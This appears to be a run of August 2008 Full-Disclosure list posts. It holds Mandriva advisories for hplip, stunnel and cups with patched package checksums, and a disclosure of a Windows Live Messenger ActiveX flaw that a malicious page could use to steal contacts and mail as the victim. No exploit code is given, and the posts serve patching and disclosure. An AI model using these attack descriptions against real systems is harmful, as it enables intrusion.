-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:169 http://www.mandriva.com/security/ ___ Package : hplip Date: August 13, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 4.0 ___ Problem Description: Marc Schoenefeld of the Red Hat Security Response Team discovered a vulnerability in the hplip alert-mailing functionality that could allow a local attacker to elevate their privileges by using specially-crafted packets to trigger alert mails that are sent by the root account (CVE-2008-2940). Another vulnerability was discovered by Marc Schoenefeld in the hpssd message parser that could allow a local attacker to stop the hpssd process by sending specially-craftd packets, causing a denial of service (CVE-2008-2941). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2940 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2941 ___ Updated Packages: Mandriva Linux 2007.1: 83a70dea97bcf550fead0ee3fad08932 2007.1/i586/hplip-2.7.7-7.2mdv2007.1.i586.rpm 7ee68cb6dc64814f9d040e8bc7ca67ef 2007.1/i586/hplip-doc-2.7.7-7.2mdv2007.1.i586.rpm b055ab176b056b0751d2b68f9e34ec52 2007.1/i586/hplip-hpijs-2.7.7-7.2mdv2007.1.i586.rpm c02f74f305d8a90c42ec1f84481067e7 2007.1/i586/hplip-hpijs-ppds-2.7.7-7.2mdv2007.1.i586.rpm 31a009fbc34f485fde381f90cd8cf76e 2007.1/i586/hplip-model-data-2.7.7-7.2mdv2007.1.i586.rpm 7a1a9cb8373fd6966f8cd495664a14a1 2007.1/i586/libhpip0-2.7.7-7.2mdv2007.1.i586.rpm 7e1ddcca51e6415638cfbba7f05ef26f 2007.1/i586/libhpip0-devel-2.7.7-7.2mdv2007.1.i586.rpm c4b990b2704cf5edb8c9d780569c6324 2007.1/i586/libsane-hpaio1-2.7.7-7.2mdv2007.1.i586.rpm c318707ebd9d10f57c612761360b1178 2007.1/SRPMS/hplip-2.7.7-7.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: ef3723584df0f9c67599674b6db8aa27 2007.1/x86_64/hplip-2.7.7-7.2mdv2007.1.x86_64.rpm 17ae578aa6993ff1200444e82197efb2 2007.1/x86_64/hplip-doc-2.7.7-7.2mdv2007.1.x86_64.rpm cd0600174962a2bd3ad3d1a4f1faadd3 2007.1/x86_64/hplip-hpijs-2.7.7-7.2mdv2007.1.x86_64.rpm 708f74ce9ce6ade4dc8167389e312f9a 2007.1/x86_64/hplip-hpijs-ppds-2.7.7-7.2mdv2007.1.x86_64.rpm 3e5832b9145aaa41f743aa670f20f014 2007.1/x86_64/hplip-model-data-2.7.7-7.2mdv2007.1.x86_64.rpm bf7d38126f996dbcd10ba514a766113d 2007.1/x86_64/lib64hpip0-2.7.7-7.2mdv2007.1.x86_64.rpm 907ce0b1d866f6ed35b782c7bea48e89 2007.1/x86_64/lib64hpip0-devel-2.7.7-7.2mdv2007.1.x86_64.rpm 37c264306ddf4f614b594b4a26bca70f 2007.1/x86_64/lib64sane-hpaio1-2.7.7-7.2mdv2007.1.x86_64.rpm c318707ebd9d10f57c612761360b1178 2007.1/SRPMS/hplip-2.7.7-7.2mdv2007.1.src.rpm Mandriva Linux 2008.0: a669379d666c88e8a16504ad983ad402 2008.0/i586/hplip-2.7.7-8.2mdv2008.0.i586.rpm 494b6e9147fb639381d4133cf98612fc 2008.0/i586/hplip-doc-2.7.7-8.2mdv2008.0.i586.rpm 17748ef3c683b999551bf3ffc4f395b3 2008.0/i586/hplip-hpijs-2.7.7-8.2mdv2008.0.i586.rpm dd608f041c6780bfc88272724ddedefc 2008.0/i586/hplip-hpijs-ppds-2.7.7-8.2mdv2008.0.i586.rpm 06d7e452624d5619288dbca8f7c70677 2008.0/i586/hplip-model-data-2.7.7-8.2mdv2008.0.i586.rpm c1d867ed0a2c6599bd281db3f287ac64 2008.0/i586/libhpip0-2.7.7-8.2mdv2008.0.i586.rpm 83425939a7d9f20abb3cf657e6abff1e 2008.0/i586/libhpip0-devel-2.7.7-8.2mdv2008.0.i586.rpm b33ae916dbb238f33af46135eeddf4bb 2008.0/i586/libsane-hpaio1-2.7.7-8.2mdv2008.0.i586.rpm 97b991d5a065c8bf99ad480485e93a35 2008.0/SRPMS/hplip-2.7.7-8.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: b405a8760af623755e8232266c382e11 2008.0/x86_64/hplip-2.7.7-8.2mdv2008.0.x86_64.rpm f98dc84adbe75fd8fa3ef132e6607d33 2008.0/x86_64/hplip-doc-2.7.7-8.2mdv2008.0.x86_64.rpm ba944e7864a866f595d499074869b9b8 2008.0/x86_64/hplip-hpijs-2.7.7-8.2mdv2008.0.x86_64.rpm cd4dd779d069352fcb35b717c35efef9 2008.0/x86_64/hplip-hpijs-ppds-2.7.7-8.2mdv2008.0.x86_64.rpm 184feac7be49c0e67c99dce1683a32ef 2008.0/x86_64/hplip-model-data-2.7.7-8.2mdv2008.0.x86_64.rpm 9d9307fe41b01a37f23916617bfd990a 2008.0/x86_64/lib64hpip0-2.7.7-8.2mdv2008.0.x86_64.rpm 91b98fd69b6ab7a7cbce027878036915 2008.0/x86_64/lib64hpip0-devel-2.7.7-8.2mdv2008.0.x86_64.rpm 500488fb28d19bdd398c55f15ae4c99b 2008.0/x86_64/lib64sane-hpaio1-2.7.7-8.2mdv2008.0.x86_64.rpm 97b991d5a065c8bf99ad480485e93a35 2008.0/SRPMS/hplip-2.7.7-8.2mdv2008.0.src.rpm Mandriva Linux 2008.1: 1ff1ac0d25edb4e0c3d355041b3ee99b 2008.1/i586/hplip-2.8.2-2.1mdv2008.1.i586.rpm 5b6887e12ad80634f844ef76332d4e6b 2008.1/i586/hplip-doc-2.8.2-2.1mdv2008.1.i586.rpm 22619a7630be2f3ece75312c107f3f18 2008.1/i586/hplip-hpijs
[Full-disclosure] Microsoft Windows Messenger Remote Illegal Access Vulnerability
Microsoft Windows Messenger Remote Illegal Access Vulnerability by cocoruder(frankruder_at_hotmail.com) http://ruder.cdut.net Summary: A remote illegal access vulnerability exists in Microsoft Windows Live Messenger. A vicious attacker can control the Live Messenger via constructing a malicious web page, once the victim visits this page, the attacker can control the local Live Messenger, including disclosing personal sensitive information of Live Messenger, transferring local audio and video information to remote and so on. Affected Software Versions: Microsoft Windows Live Messenger 4.7 on Windows XP and Windows Server 2003 Microsoft Windows Live Messenger 5.1 on Windows 2000, Windows XP and Windows Server 2003 Details: When installing Windows XP, an old edition of MSN Messenger is installed automatically. The old edition opens the MSN API to develop as an ActiveX Control, and marks it with "safe". By using this ActiveX Control, we can control the local MSN Messenger, for instance: change state, gain current login ID, steal contact-person's information, send mail using the victim's name, and so on, all of these functions given by this feature can be considered to be security problems. Even the user installs a higher edition of MSN Messenger(Windows Live Messenger), this ActiveX control will not be removed. By using this we will still be allowed to visit the local Live Messenger. Solution: Microsoft has released an advisory for this vulnerability which can be found at: http://www.microsoft.com/technet/security/bulletin/ms08-050.mspx CVE Information: CVE-2008-0082 Disclosure Timeline: 2007.05.31Vendor notified 2007.05.31Vendor responded 2008.XX.XXAdvisory delayed by the vendor many times 2008.08.12Coordinated public disclosure --EOF-- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2008:168 ] stunnel
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:168 http://www.mandriva.com/security/ ___ Package : stunnel Date: August 13, 2008 Affected: 2007.1, 2008.0, 2008.1 ___ Problem Description: A vulnerability was found in the OCSP search functionality in stunnel that could allow a remote attacker to use a revoked certificate that would be successfully authenticated by stunnel (CVE-2008-2420). This flaw only concerns users who have enabled OCSP validation in stunnel. The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2420 ___ Updated Packages: Mandriva Linux 2007.1: 8d76312a1f68dae3c5547d1efe1f04cc 2007.1/i586/libstunnel0-4.20-1.1mdv2007.1.i586.rpm da8a96417052081eb33b507f308a6c4b 2007.1/i586/libstunnel0-devel-4.20-1.1mdv2007.1.i586.rpm b5c31bfed05245b1c0d4597ded096312 2007.1/i586/stunnel-4.20-1.1mdv2007.1.i586.rpm 748e1bb078bd1ac4e1e6c00b6487c1d1 2007.1/SRPMS/stunnel-4.20-1.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: eb6d688c10d208e525463866bfe329b4 2007.1/x86_64/lib64stunnel0-4.20-1.1mdv2007.1.x86_64.rpm ef94ec15ddb3eba1d2c8b17e17dd52e9 2007.1/x86_64/lib64stunnel0-devel-4.20-1.1mdv2007.1.x86_64.rpm 4b16e5420f5d54420a2399c6d03a93dd 2007.1/x86_64/stunnel-4.20-1.1mdv2007.1.x86_64.rpm 748e1bb078bd1ac4e1e6c00b6487c1d1 2007.1/SRPMS/stunnel-4.20-1.1mdv2007.1.src.rpm Mandriva Linux 2008.0: 7a790c1d719af5dc1643e5df86f8f8a7 2008.0/i586/libstunnel0-4.20-1.1mdv2008.0.i586.rpm 4f1c7188d0c0b37619806db9bd2c817a 2008.0/i586/libstunnel0-devel-4.20-1.1mdv2008.0.i586.rpm af62cf5ddc6a2245b71e3f184837cfab 2008.0/i586/stunnel-4.20-1.1mdv2008.0.i586.rpm 4b30c083467a6c39ccadfbf11aca0349 2008.0/SRPMS/stunnel-4.20-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 77ff841a053da0420a6bd673106c5505 2008.0/x86_64/lib64stunnel0-4.20-1.1mdv2008.0.x86_64.rpm 3ec61049acebcadf3f3a758316aa161c 2008.0/x86_64/lib64stunnel0-devel-4.20-1.1mdv2008.0.x86_64.rpm 0e796c52f469cf1b3514336de2da4f9a 2008.0/x86_64/stunnel-4.20-1.1mdv2008.0.x86_64.rpm 4b30c083467a6c39ccadfbf11aca0349 2008.0/SRPMS/stunnel-4.20-1.1mdv2008.0.src.rpm Mandriva Linux 2008.1: 6e339adfe0c54fa629fe274c1647e390 2008.1/i586/libstunnel0-4.21-2.1mdv2008.1.i586.rpm f9a621e2ffd56803df35989fcd503781 2008.1/i586/libstunnel-devel-4.21-2.1mdv2008.1.i586.rpm 14fd3a1dbc4dfda671ce5d7b12d471cf 2008.1/i586/libstunnel-static-devel-4.21-2.1mdv2008.1.i586.rpm 1fc86b79e57285aa4ebcc6c08f67c656 2008.1/i586/stunnel-4.21-2.1mdv2008.1.i586.rpm 9633ff426cab24ddb64434c2fc4c1416 2008.1/SRPMS/stunnel-4.21-2.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: d1c79ff16707a8d6e0303562207821f3 2008.1/x86_64/lib64stunnel0-4.21-2.1mdv2008.1.x86_64.rpm b9f07f12bff285f437e49fe82a105778 2008.1/x86_64/lib64stunnel-devel-4.21-2.1mdv2008.1.x86_64.rpm b4548ec863f78cb0e82059579860e59d 2008.1/x86_64/lib64stunnel-static-devel-4.21-2.1mdv2008.1.x86_64.rpm dc3877966ffddfdb363cf4a0edcca71f 2008.1/x86_64/stunnel-4.21-2.1mdv2008.1.x86_64.rpm 9633ff426cab24ddb64434c2fc4c1416 2008.1/SRPMS/stunnel-4.21-2.1mdv2008.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIo4ZYmqjQ0CJFipgRAlJcAJ9SxbqPWr7rFfXOQrvunstzD6CaDQCcDFVV gu0oRt+IXZm2jrzLl95gwaQ= =rbeI -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2008:170 ] cups
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:170 http://www.mandriva.com/security/ ___ Package : cups Date: August 13, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 ___ Problem Description: Thomas Pollet discovered an integer overflow vulnerability in the PNG image handling filter in CUPS. This could allow a malicious user to execute arbitrary code with the privileges of the user running CUPS, or cause a denial of service by sending a specially crafted PNG image to the print server (CVE-2008-1722). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1722 ___ Updated Packages: Mandriva Linux 2007.1: e6e836d1d60b2fa4e89626ca342718da 2007.1/i586/cups-1.2.10-2.7mdv2007.1.i586.rpm 23bbf517fb49c494c964f2fd0c7e486f 2007.1/i586/cups-common-1.2.10-2.7mdv2007.1.i586.rpm 0dcf242590878f1bcc19a9a67f2bf6f8 2007.1/i586/cups-serial-1.2.10-2.7mdv2007.1.i586.rpm b13c0e72bbbc55e9fc5d1d2fa233c815 2007.1/i586/libcups2-1.2.10-2.7mdv2007.1.i586.rpm 43ae6ae77fe663392eab35dd6e86dcf9 2007.1/i586/libcups2-devel-1.2.10-2.7mdv2007.1.i586.rpm c485c64d51554dcae1636bae567d52bb 2007.1/i586/php-cups-1.2.10-2.7mdv2007.1.i586.rpm 02cf79142cb3188f74ac7b23826531ec 2007.1/SRPMS/cups-1.2.10-2.7mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 8704d20431f56cdfbfa2a81ff0c9716b 2007.1/x86_64/cups-1.2.10-2.7mdv2007.1.x86_64.rpm e347090c027bfceb5d36077750bbde52 2007.1/x86_64/cups-common-1.2.10-2.7mdv2007.1.x86_64.rpm 03a84b9825640e559c2f22c0d498324d 2007.1/x86_64/cups-serial-1.2.10-2.7mdv2007.1.x86_64.rpm 8992cab63c56d088ac5e7f6e47c1380f 2007.1/x86_64/lib64cups2-1.2.10-2.7mdv2007.1.x86_64.rpm 3dfee471c6ab99379610af928d074063 2007.1/x86_64/lib64cups2-devel-1.2.10-2.7mdv2007.1.x86_64.rpm d1803179503ff874539580d027d50f0e 2007.1/x86_64/php-cups-1.2.10-2.7mdv2007.1.x86_64.rpm 02cf79142cb3188f74ac7b23826531ec 2007.1/SRPMS/cups-1.2.10-2.7mdv2007.1.src.rpm Mandriva Linux 2008.0: ad1944423890980426468c9d2cc35292 2008.0/i586/cups-1.3.6-1.2mdv2008.0.i586.rpm e2da311a716df6075450e3fc700f8fa0 2008.0/i586/cups-common-1.3.6-1.2mdv2008.0.i586.rpm 26952cab7a9352b7ee261e324cb2a864 2008.0/i586/cups-serial-1.3.6-1.2mdv2008.0.i586.rpm 596464ca36baba5e1ea8a3b82c0b5aca 2008.0/i586/libcups2-1.3.6-1.2mdv2008.0.i586.rpm 38628e8316b29e266bbfce642ff40ed4 2008.0/i586/libcups2-devel-1.3.6-1.2mdv2008.0.i586.rpm 16a7a67f6ea9d0533500a02f5fc2197d 2008.0/i586/php-cups-1.3.6-1.2mdv2008.0.i586.rpm cf55fd60312efe614352598a124ad721 2008.0/SRPMS/cups-1.3.6-1.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: bc0185dc8eb598431661de50b6b67538 2008.0/x86_64/cups-1.3.6-1.2mdv2008.0.x86_64.rpm 07bc12fc705e94ba554b915b48778726 2008.0/x86_64/cups-common-1.3.6-1.2mdv2008.0.x86_64.rpm bb085c47b0c75e6244d25c3ac6575013 2008.0/x86_64/cups-serial-1.3.6-1.2mdv2008.0.x86_64.rpm 7cae6612c1bcc43b0d8ecc14dd24b2b7 2008.0/x86_64/lib64cups2-1.3.6-1.2mdv2008.0.x86_64.rpm b3566be34e2041b40f7ed6be97cec831 2008.0/x86_64/lib64cups2-devel-1.3.6-1.2mdv2008.0.x86_64.rpm 02195805095b57b48f41f82ae25ba35e 2008.0/x86_64/php-cups-1.3.6-1.2mdv2008.0.x86_64.rpm cf55fd60312efe614352598a124ad721 2008.0/SRPMS/cups-1.3.6-1.2mdv2008.0.src.rpm Mandriva Linux 2008.1: cead86dad7a602167161f8e62fd6c43c 2008.1/i586/cups-1.3.6-5.1mdv2008.1.i586.rpm 2c3a0be519d0f027ef9ad58a0502ea06 2008.1/i586/cups-common-1.3.6-5.1mdv2008.1.i586.rpm 40a13e5f2d2d7b557cc3cd18a271444a 2008.1/i586/cups-serial-1.3.6-5.1mdv2008.1.i586.rpm f7ac7c6daa9e94d7be7215d20b5a9dd8 2008.1/i586/libcups2-1.3.6-5.1mdv2008.1.i586.rpm 4e684a41c2174acc19a3ca26917503a5 2008.1/i586/libcups2-devel-1.3.6-5.1mdv2008.1.i586.rpm cd62b541b3a8ff5076081aaa98dcd186 2008.1/i586/php-cups-1.3.6-5.1mdv2008.1.i586.rpm 2eed67e578b217fe60b9b88dd8f67efe 2008.1/SRPMS/cups-1.3.6-5.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 6260df80fd2ed6a506cda8b8e08a8965 2008.1/x86_64/cups-1.3.6-5.1mdv2008.1.x86_64.rpm 4d4f83b7b4c345ed09bcf7a30bcf563c 2008.1/x86_64/cups-common-1.3.6-5.1mdv2008.1.x86_64.rpm ff623fb9ade013d2e9162171cda2987b 2008.1/x86_64/cups-serial-1.3.6-5.1mdv2008.1.x86_64.rpm 452d007674d0bf192a1b1e142b5b8425 2008.1/x86_64/lib64cups2-1.3.6-5.1mdv2008.1.x86_64.rpm ec07d9fdf765dbccea3a85d65301b12f 2008.1/x86_64/lib64cups2-devel-1.3.6-5.1mdv2008.1.x86_64.rpm 3dc1a8a3673ed4c98b706067eea40b1d 2008.1/x86_64/php-cups-1.3.6-5.1mdv2008.1.x86_64.rpm 2eed67e578b217fe60b9b88dd8f67efe 2008.1/SRP
